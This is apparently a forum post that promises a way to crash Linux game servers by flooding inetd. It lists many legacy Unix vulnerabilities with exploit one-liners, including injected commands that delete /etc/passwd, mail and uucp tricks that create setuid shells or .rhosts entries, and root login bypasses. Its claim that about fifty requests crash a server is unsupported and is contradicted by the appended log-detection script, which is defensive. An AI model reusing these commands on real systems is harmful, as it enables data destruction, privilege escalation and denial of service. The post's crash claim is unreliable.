Crashing a Linux server (almost all game servers.)

Status
Not open for further replies.

Selldofus

Banned member
Mar 2, 2011
Hello,

Command: inetd
Affected system: Linux

A Linux server that accepts TCP connections under inetd can be crashed by flooding it with requests. About fifty requests cause the server to refuse inetd connections, because the server will have crashed. This works for all services under inetd, so ftpd, identd...

Here is a list of old bugs:

Operating System RVP Date Description (References)

/bin/sh 1-- 12/12/94 IFS hole, vi ()
/bin/su 1-- overwrite stack somehow? ()
/dev/fb 1-- frame buffer devices readable/writeable, ()
/dev/kmem 1-- /dev/kmem should not be o+w ()
/dev/mem 1-- /dev/mem should not be o+w ()
/dev/*st*, *mt* 1-- generally world readable/writeable ()
/etc 1-- rexd + MACH ? [NeXT] /etc/ g+w daemon ()
4.3 Tahoe 1-- chfn -- allows newlines/meta chars/bufsize ()
4.3 Tahoe 1-- ttyA&B;A:cat<ttyB;^Z;B:exit;login;A:&;Bw/uid;A:got pw ()
AIX ? 5++ setenv SHELL=/bin/sh; crontab -e; :!/bin/sh ()
AIX 2.2.1 1-- shadow password file o+w ()
AIX 3.1.5 5-- sendmail- mail to programs ()
AIX 3.2 5-- sendmail- mail to programs ()
AIX 3.2.4 5-- sendmail- mail to programs ()
AIX 3.2.5 5-- sendmail- mail to programs ()
AIX 3.X.X ??? rlogin localhost -l -froot
AIX ? 1-- * password means use root's password? ()
AIX ? 1-- rexd- any can get root access if enabled ()
Amdahl UTS 2.0 1-- NFS mountd only uses hostname ()
AT&T SVR3.2.0 1-- Bad protected mode allows root if have sh + cc ()
A/UX 2.0.1 5-- lpr -s; 1000 calls lpr re-use fname ()
A/UX 2.0.1 5-- rdist(1) uses popen(3), IFS spoof ()
BellTech SYSV386 1-- ulimit 0; passwd ==> zero's out passwd file ()
BSD 4.1 1-- Sendmail can mail directly to a file
BSD 4.1 1-- can mail directly to a file
BSD 4.1 1-- run set gid program, dump core, is set gid
BSD 4.1 1-- lock- compiled password "hasta la vista", + ^Z ()
BSD <4.2? 1-- IFS w. preserve bug in vi ()
BSD 4.1 1-- mail directly to a file ()
BSD 4.1 1-- exec sgid program, dump core, core is sgid ()
BSD 4.1 1-- Sendmail: can mail directly to a file ()
BSD 4.1 1-- lock password "hasta la vista" backdoor ()
BSD <4.2 1-- IFS w/ preserve bug w/vi ()
BSD <4.2 1-- suspend mkdir, ln file you want to dir ()
BSD <4.2? 1-- suspend mkdir, ln file you want to dir ()
BSD 4.2 1-- lock -- compiled in password "hasta la vista" ()
BSD 4.2 1-- ln passwd file to mail spool, mail to file ()
BSD 4.2 1-- can truncate read only files ()
BSD 4.2 1-- finger "string|/bin/rm -f /etc/passwd"@foo.bar ()
BSD 4.2 1-- ln -s target ~/.plan; finger user to read file ()
BSD 4.2 1-- lpr file; rm file; ln -s /any/filename file ()
BSD 4.2 1-- adb su; change check in memory; shell out ()
BSD 4.2 1-- race condition, can get root via "at" ()
BSD 4.2 1-- lock -- compiled in password "hasta la vista"
BSD 4.2 1-- ln passwd file to mail spool, mail user ()
BSD 4.2 1-- can truncate read only files ()
BSD 4.2 1-- finger "string|/bin/rm -f /etc/passwd"@foo.bar ()
BSD 4.2 1-- ln -s target ~/.plan; finger user. ()
BSD 4.2 1-- lpr file; rm file; ln -s /any/filename file ()
BSD 4.2 1-- adb su; change check in memory; shell out; su ()
BSD 4.2 1-- race condition, can get root via "at" ()
BSD 4.2 1-- /dev/kmem and /dev/mem should not be o+w ()
BSD 4.2 1-- signal any process by changing process group ()
BSD 4.3 1-- ftp -n; quote user ftp; etc. Gets root privs. ()
BSD 4.3 1-- lpd can overwrite file ()
BSD 4.3 1-- ln -s /any/suid/file -i ; -i Get suid shell. ()
BSD 4.3 1-- fchown (2) can chown _any_ file ()
BSD 4.3 1-- race condition, get root via "at" ()
BSD 4.3 1-- passwd chokes on long lines, splits pw file ()
BSD 4.3 1-- ftp -n; quote user ftp; cd ~root, get root ()
BSD 4.3 1-- lpd can overwrite file ()
BSD 4.3 1-- ln -s /any/suid/file -i ; -i Get suid shell ()
BSD 4.3 1-- fchown (2) can chown _any_ file ()
BSD 4.3 1-- race condition (expreserve?), root via "at" ()
BSD 4.3 1-- passwd chokes on long lines, splits pw file ()
BSD 4.3 5-- lpr -s; 1000 calls lpr re-use fname ()
BSD NET/2 5-- rdist(1) uses popen(3), IFS spoof ()
BSD NET/2 5-- lpr -s; 1000 calls lpr re-use fname ()
BSD ? 1-- Overwrite gets buffer -- fingerd, etc
BSD ? 1-- uudecode alias can overwrite root/daemon files ()
BSD ? 1-- /bin/mail ; !/bin/sh Get uid=bin shell ()
BSD ? 1-- rwall bug ()
BSD ? 1-- adb the running kernel, shell out and get root ()
BSD ? 1-- sendmail can mail non-root file, try twice ()
BSD ? 1-- rshd -- spoof via nameservice, rsh target -l uid
BSD386 1-- mail"<u>;cp /bin/sh /tmp;chmod 6777 /tmp/sh" ()
buffer overrun 1-- chfn ()
chfn, chsh 1-- used to create a root account ()
chmod 1-- Incorrect file or directory permissions ()
comsat 1-- running as root, utmp o+w, writes to files ()
core 1-- will system dump a setgid core image? ()
decode 1-- decode mail alias - write non-root user files ()
DellSVR3.2/1.0.6 1-- Bad prot mode allows root if have sh + cc ()
denial 1-- easy to hog processor, memory, disc, tty, etc ()
DomainO/S <=10.3 1-- break root by using s/rbak; sgid/suid ()
DomainO/S <=10.4 5-- sendmail mail to programs ()
DNS 1-- SOA can control bogus reverse ip, rhosts ()
Domain/OS <10.3 1-- break root by using s/rbak; setgid/uid ()
DYNIX 3.0.14 1-- Sendmail -C file ==> displays any file. ()
DYNIX 3.? 1-- can get root on NFS host via root via mountd ()
DYNIX 3.? 1-- on non-trusted host due to bug in mount daemon ()
DYNIX ? 1-- rsh <host> -l "" <command> runs as root ()
DYNIX ? 1-- login: -r hostnameruser^@luser^@term^@ ()
elm 5-- ELM's autoreply can be used to get root ()
expreserve 1-- can be a huge hole ()
ESIX Rev. D 1-- Bad protected mode allows root if sh+cc ()
file mod test 1-- test file doesn't lose the suid when modified ()
fsck 1-- lost+found should be mode 700 ()
ftpd 1-- static passwd struct overwrite, wuftp < x.xx ()
ftpd 4.2 1-- userid not reset properly, "user root" ()
ftpd ? 1-- core files may contain password info ()
fchown 1-- test for bad group test ()
ftruncate 1-- can be used to change major/minor on devices ()
fingerd 1-- .plan hard-links - read files, fingerd ()
gopher 6-- Type=8 Name=shell Host=;/bin/sh Port= Path= ()
gnuemacs 1-- emacsclient/server allows access to files. ()
GN <1.19 4+- exec0::/path/prog?var=blah%0Ahack-coomands0%A ()
HDB 1-- nostrangers shell escape ()
HDB 1-- changing the owner of set uid/gid files ()
HDB 1-- meta escapes on the X command line ()
HDB 1-- ; breaks on the X line ()
hosts.equiv 1-- default + entry ()
hosts.equiv 1-- easy to spoof by bad SOA at remote site ()
HPUX <7.0 1-- chfn -- allows newlines, etc ()
HP-UX 1-- sendmail: mail directly to programs ()
HPUX A.09.01 1-- sendmail: mail directly to programs ()
HPUX ? 1-- Sendmail: versions 1.2&13.1 sm, -oQ > ()
IDA 1.4.4.1 1-- :include:/some/unreadable/file in ~/.forward ()
ICMP 4-- various icmp attacks possible ()
ICMP 1-- ICMP redirect packets change non-static routes ()
Interactive 2.x 1-- Bad protected mode allows root if sh+cc ()
IRIX 3.3 1-- any user can read any other user's mail. ()
IRIX 3.3.1 1-- any user can read any other user's mail. ()
IRIX 3.3/3.31 1-- sendmail- any user can read other user's mail ()
IRIX 4.0.X 1-- default suid scripts ()
IRIX 4.0.X 1-- various $PATH problems ()
IRIX 4.0.X 1-- sendmail race condition hole ()
IRIX 4.0.X 1-- lpd are vulnerable too ()
IRIX ? 1-- rsh <host> -l "" <command> runs as root ()
IRIX ? 1-- login: -r hostnameruser^@luser^@term^@ ()
IRIX ? 1-- Overwrite gets buffer -- fingerd, etc ()
IRIX ? 1-- uudecode alias can overwrite root/daemon files ()
IRIX ? 1-- /bin/mail ; !/bin/sh Get uid=bin shell ()
IRIX ? 1-- rwall bug ()
IRIX ? 1-- adb the running kernel, shell out and get root ()
IRIX ? 1-- mail to any non-root owned file, try twice ()
IRIX ? 1-- rshd- spoof via dns - rsh target -l uid ()
IRIX ? 1-- xwsh log hole? (yo)
kernel 1-- Race conditions coupled with suid programs ()
lock 1-- 4.1bsd version had password "hasta la vista" ()
lost+found 1-- lost+found should be mode 700 ()
lpd 1-- overwrite files with root authority ()
lpr 1-- lpr -r access testing problem ()
lpr 5-- lpr -s; 1000 calls lpr re-use fname ()
lprm 1-- trusts utmp ()
mount 1-- "mount" should not be +x for users. ()
mqueue 1-- must not be mode 777! ()
movemail 1-- worm? ()
Microport 3.0 1-- ulimit 0; passwd ==> zero's out passwd file ()
network 1-- BSD network security based on "reserved ports" ()
news 1-- news receivers may execute shell commands ()
network 1-- kerberos ()
network 1-- Networks are usually very insecure. ()
NFS 1-- Many systems can be compromised with NFS/RPC. ()
NFS 1-- proxy rpc can read remote nfs files ()
NFS 1-- can generate NFS file handles ()
NFS 1-- mount disk, make cd .. and no restricted directories
OSF/1 1.2 1-- write allows shell outs to gain egid term ()
OSF/1 1.3 1-- write allows shell outs to gain egid term ()
OSF/1 1.2 1-- doesn't close the fd to the term writing to ()
OSF/1 1.3 1-- doesn't close the fd to the term writing to ()
passwd 1-- fgets allows entries mangled into ::0:0::: ()
passwd 1-- fred:...:...:...:Fred ....Flintstone::/bin/sh ()
passwd 1-- IDs shouldn't contain: ;~!` M- spoof popen ()
portmap 1-- binding problems... ()
root 1-- ? (fingerd_test.sh)
rcp 1-- nobody problem ()
rexd 1-- existence ()
rexd 1-- MACH ? [NeXT] /etc/ g+w daemon ()
rdist 1-- buffer overflow ()
rdist 5-- rdist(1) uses popen(3), IFS spoof ()
RISC/os 4.51? 1-- rsh <host> -l "" <command> runs as root ()
RPC 1-- Many systems can be compromised with NFS/RPC. ()
rwall 1-- running as root, utmp o+w , writes to files ()
SCO 3.2v4.2 5-- rdist(1) uses popen(3), IFS spoof ()
SCO ? 1-- rlogin to any acct to trusted host w/o pwd ()
SCO ? 1-- rlogin to any acct from trusted host w/o pwd ()
selection_svc 1-- allowed remote access to files ()
sendmail <x.x 1-- -bt -C/usr/spool/mail/user - reads file ()
sendmail <5.57 1-- from:<"|/bin/rm /etc/passwd"> && bounce mail ()
sendmail <=5.61 1-- can mail to any file not root owned, try twice ()
sendmail <5.61 1-- sendmail- groups incorrectly, get group ()
sendmail >5.65 1-- can get daemon privileges via .forward. ()
sendmail ? 5++ can mail to programs (sendmal1, nmh, smail)
sendmail ? 1-- debug option ()
sendmail ? 1-- wizard mode ()
sendmail ? 1-- TURN command allows mail to be stolen ()
sendmail ? 1-- decode mail alias - write non-root user files ()
sendmail ? 1-- buffer overflow cause sendmail daemon lock up ()
sendmail ? 1-- what uid does |program run with? ()
SIGNALS 1-- signal any process by changing process group ()
Stellix 2.0? 1-- rsh <host> -l "" <command> runs as root ()
Stellix 2.0 1-- rsh <host> -l "" <command> runs as root ()
Stellix 2.1 1-- login: -r hostnameruser^@luser^@term^@ ()
suid 1-- will run .profile if linked to - , IFS ()
suid 1-- never call system(3) and popen(3) ()
suid 1-- May not expect filesize signals, SIGALRMs ()
suid 1-- no setuid program on a mountable disk ()
suid 1-- ro mounting of foreign disk may allow suid. ()
suid 1-- .plan links ()
suid 1-- /usr/ucb/mail ~!cp /bin/sh /tmp/sh; chmod 2555 /tmp/sh ()
SunOS 3.3 1-- ftpd - userid not reset properly, "user root" ()
SunOS 3.5 1-- connect w/acct;user root;ls;put /tmp/f/ tmp/b ()
SunOS <4.0 1-- sunview - any user can read any remote file
SunOS <4.0 1-- any user can run yp server ()
SunOS 4.0 1-- chsh -- similar to chfn ()
SunOS 386i 1-- rm logintool, hack login with adb, chmod 2750 ()
SunOS 386i/4.01? 1-- login -n root requires no password ()
SunOS 386i/4.01? 1-- login -n root (no password) ()
SunOS 4.0.1 1-- chfn buffer problems ()
SunOS 4.0.1 1-- chsh buffer problems ()
SunOS 4.0.1 1-- ypbind/ypserv, SunOS 4.0.1; need 3 machines ()
SunOS 4.0.3 1-- ypbind/ypserv, SunOS 4.0.1; need 3 machines ()
SunOS 4.0.3 1-- concurrent yppasswd sessions can trash yp map ()
SunOS 4.0.3 1-- mail to any non-root owned file, try twice ()
SunOS 4.0.3 1-- rcp buffer overflow ()
SunOS 4.0.3 1-- sendmail- mail to non-root file, try twice ()
SunOS 4.0.3 1-- ttyA&B;A:cat<ttyB;^Z;B:exit;login;A:&;Bw/uid;A:gets PW ()
SunOS 4.0.3 1-- uucico can show ph num, login, passwd, on remote machine ()
SunOS 4.0.3 1-- ypserv sends maps to anyone w/ domain (ypsnarf)
SunOS 4.0.? 1-- anyone can restore a file over any other file. ()
SunOS 4.0.? 1-- chfn -- allows newlines, meta chars, bufsize problem. ()
SunOS 4.0.? 1-- rcp with uid -2; only from PC/NFS. ()
SunOS 4.0.? 1-- ln -s /any/suid/file -i ; -i ()
SunOS 4.0.? 1-- selection_svc can remotely grab files. ()
SunOS 4.1 1-- rshd: spoof via nameservice, rsh target -l uid ()
SunOS 4.1 1-- shared libs accept relative paths w/ suid ()
SunOS 4.1 1-- sendmail: groups incorrectly checked, can get any group ()
SunOS 4.1 1-- comsat can overwrite any file ()
SunOS 4.1.x 1-- comsat can overwrite any file ()
SunOS 4.1.x 1-- ptrace allows to become root ()
SunOS 4.1.x 1-- openlook: telnet 2000; executive,x3, run ps int ()
SunOS <4.1.1 5-- lpr -s; 1000 calls lpr re-use fname ()
SunOS 4.1.2 5-- rdist(1) uses popen(3), IFS spoof ()
SunOS ? 1-- /usr/kvm/crash allows sh escapes group kmem ()
SunOS ? 1-- ttyA&B;A:cat<ttyB;^Z;B:exit;login;A:&;Bw/uid;A:gets PW()
SunOS ? 1-- /dev/kmem and /dev/mem should not be o+w ()
SunOS ? 1-- rshd -- spoof via nameservice, rsh target -l uid
SunOS ? 1-- ftp -n; quote user ftp; etc. Gets root privs. ()
SunOS ? 1-- symlink .plan to target file, finger user to read. ()
SunOS ? 1-- Overwrite gets buffer -- fingerd, etc. (3.5)
SunOS ? 1-- rwall bug (<= 4.01 yes). ()
SunOS ? 1-- ptrace allows to become root ()
SunOS ? 4-- icmp errors not handled correctly ()
SunOS ? 1-- adb the running kernel, shell out and get root ()
SunOS ? 1-- ftp -n; quote user ftp; etc. Gets root privs ()
SunOS ? 1-- lpd can overwrite file ()
SunOS ? 1-- the window manager can be used to read any file ()
SunOS ? 1-- rexd -- any can get root access if enabled ()
SunOS ? 1-- emacsclient/server allows access to files ()
SunOS ? 1-- openlook; telnet port 2000; executive,x3, runs PS interp
SunOS ? 1-- devinfo can be used to get group kmem ()
SunOS 5.1 1-- Symlinks are broken ()
syslogd 6-- buffer overrun, allows remote access ()
syslogd 1-- syslog messages used to overwrite any file ()
system 1-- system(3) even w/ setuid(getuid()) = IFS ()
SYSV <R4 1-- write to files; race condition w/ mkdir & ln ()
SYSV <R4 1-- expreserve problem/race condition ()
SYSV R? 1-- IFS, other environment at "login:" prompt ()
tcp/ip 1-- sequence number prediction allows spoofing ()
tcp/ip 1-- source routing make host spoofing easier ()
tcp/ip 1-- rip allows one to capture traffic more easily ()
tcp/ip 4-- various icmp attacks possible ()
tftp 1-- puts/gets -- grab files, do chroot ()
traceroute 1-- allow one to easily dump packets onto net ()
ulimit 1-- passwd(1) leaves passwd locked if ulimit set ()
Ultrix 2.0? 1-- sendmail- 1.2&13.1 sm, -oQ > can r/w any ()
Ultrix 2.0? 1-- Sendmail -C file ==> displays any file. ()
Ultrix 2.2? 1-- Sendmail -C file ==> displays any file. ()
Ultrix 2.2 1-- ln passwd file to mail spool, mail to user ()
Ultrix 2.2 1-- on a non-trusted host due to bug in mountd ()
Ultrix 2.2 1-- Sendmail: -C file ==> displays any file ()
Ultrix 2.2 1-- can get root on NFS host via root via mountd ()
Ultrix 2.2 1-- get root on host running NFS from other root ()
Ultrix 3.0 1-- lock -- compiled in password "hasta la vista" ()
Ultrix 3.0 1-- login -P progname allows run programs as root ()
Ultrix 3.0 1-- login can run any program with root privs ()
Ultrix 3.0 1-- ln -s target ~/.plan; finger user to access ()
Ultrix 3.0 1-- any user can mount any filesystem ()
Ultrix 3.0 1-- X11 doesn't clear pwds in mem; /dev/mem is o+w ()
Ultrix <3.1 1-- limit file 0; passwd -->zero's out passwd file ()
Ultrix <3.1 1-- lpd can overwrite any file (back to 2.0?) ()
Ultrix 3.1? 1-- rshd: spoof via nameservice, rsh target -l uid ()
Ultrix 3.1? 1-- allows newlines, meta chars, buffsize problem ()
Ultrix <4.1 1-- overflow RISC reg buffer, get root w/ mail ()
Ultrix ? 1-- rshd -- spoof via dns, rsh target -l uid ()
Ultrix ? 1-- ypbind takes ypset from all; spoof yp DB ()
Ultrix ? 1-- yppasswd leaves yp data files world writable ()
Ultrix ? 1-- chfn -- allows newlines, meta chars, bufsize ()
Ultrix ? 1-- ftp -n; quote user ftp; etc. Gets root privs ()
Ultrix ? 1-- can change host name, mount any filesystem ()
Ultrix ? 1-- uudecode alias can overwrite root/daemon files ()
Ultrix ? 4-- ICMP not handled correctly (nuke)
Ultrix ? 1-- emacsclient/server allows access to files ()
Ultrix ? 1-- lock: password "hasta la vista" backdoor ()
Ultrix ? 1-- /dev/kmem and /dev/mem should not be o+w ()
Ultrix ? 1-- can change physical ethernet address ()
UNIX 1-- / must not be go+w ()
utmp 1-- etc/utmp o+w ? ()
utmp 1-- check to see if world writeable (rwall, comsat)
utmp 1-- syslog messages can overwrite any file ()
uucp 1-- check valid UUCP akts in the /etc/ftpusers ()
uucp 1-- echo "myhost myname">x;uucp x ~uucp/.rhosts ()
uucp 1-- uucico shows ph num, login, passwd, of remote ()
uudecode 1-- if it is setuid, may create setuid files ()
uusend 1-- uusend may call "uux" while suid to root ()
uux 1-- uusend may call "uux" while suid to root ()
X11R? 1-- snoop on keyboards and bitmaps ()
X11R3 1-- can set log on and exec (fixed in "fix-6")
X11R4 1-- can set log on and exec (fixed in "fix-6")
X11R ? 1-- snoop on keyboards and bitmaps ()
X11R5 5++ xterm can create files (xterm1__)
xhost 1-- if + , anyone can connect to X server ()
ypbind 1-- accepts ypset from anyone ()
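
Added example, not part of the original post: a syslog check an administrator can use to spot the inetd connection flood described at the top of the post. It assumes tcpd-style `connect from` lines and inetd's `server failing (looping)` message; the log lines, host names and the 40-connections-per-60-seconds threshold are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample syslog lines (not from the original post): 50 FTP
# connections in 50 seconds from one source, then inetd disabling the service.
SAMPLE = "\n".join(
    [f"Mar  2 10:00:{s:02d} gamehost in.ftpd[{2000 + s}]: connect from 198.51.100.7"
     for s in range(50)]
    + ["Mar  2 10:00:50 gamehost inetd[311]: ftp/tcp server failing (looping), service terminated",
       "Mar  2 10:03:10 gamehost in.identd[2100]: connect from 192.0.2.44"]
)

CONNECT = re.compile(r"^(\w{3}\s+\d+ [\d:]{8}) \S+ (in\.\w+)\[\d+\]: connect from (\S+)")
LOOPING = re.compile(r"^(\w{3}\s+\d+ [\d:]{8}) \S+ inetd\[\d+\]: (\S+) server failing \(looping\)")

def parse_ts(text, year=2011):
    """Syslog timestamps carry no year, so the caller supplies one (assumed here)."""
    return datetime.strptime(f"{year} {text}", "%Y %b %d %H:%M:%S")

def analyze(log_text, max_conn=40, window=timedelta(seconds=60)):
    """Return (bursts, disabled).

    bursts:   {(service, source): peak connections seen inside one window}
              for every pair that exceeded max_conn (assumed threshold).
    disabled: [(timestamp, service)] for each time inetd shut a service off.
    """
    recent = defaultdict(deque)  # (service, source) -> timestamps still in window
    bursts, disabled = {}, []
    for line in log_text.splitlines():
        m = CONNECT.match(line)
        if m:
            ts, key = parse_ts(m.group(1)), (m.group(2), m.group(3))
            q = recent[key]
            q.append(ts)
            while ts - q[0] > window:  # drop entries older than the window
                q.popleft()
            if len(q) > max_conn:
                bursts[key] = max(bursts.get(key, 0), len(q))
            continue
        m = LOOPING.match(line)
        if m:
            disabled.append((parse_ts(m.group(1)), m.group(2)))
    return bursts, disabled

if __name__ == "__main__":
    bursts, disabled = analyze(SAMPLE)
    for (svc, src), peak in bursts.items():
        print(f"burst: {peak} connections to {svc} from {src} within 60s")
    for ts, svc in disabled:
        print(f"{ts}: inetd disabled {svc}")
```

Set `max_conn` and `window` to match the rate limit configured for the inetd in use, so the alert fires before the service is switched off.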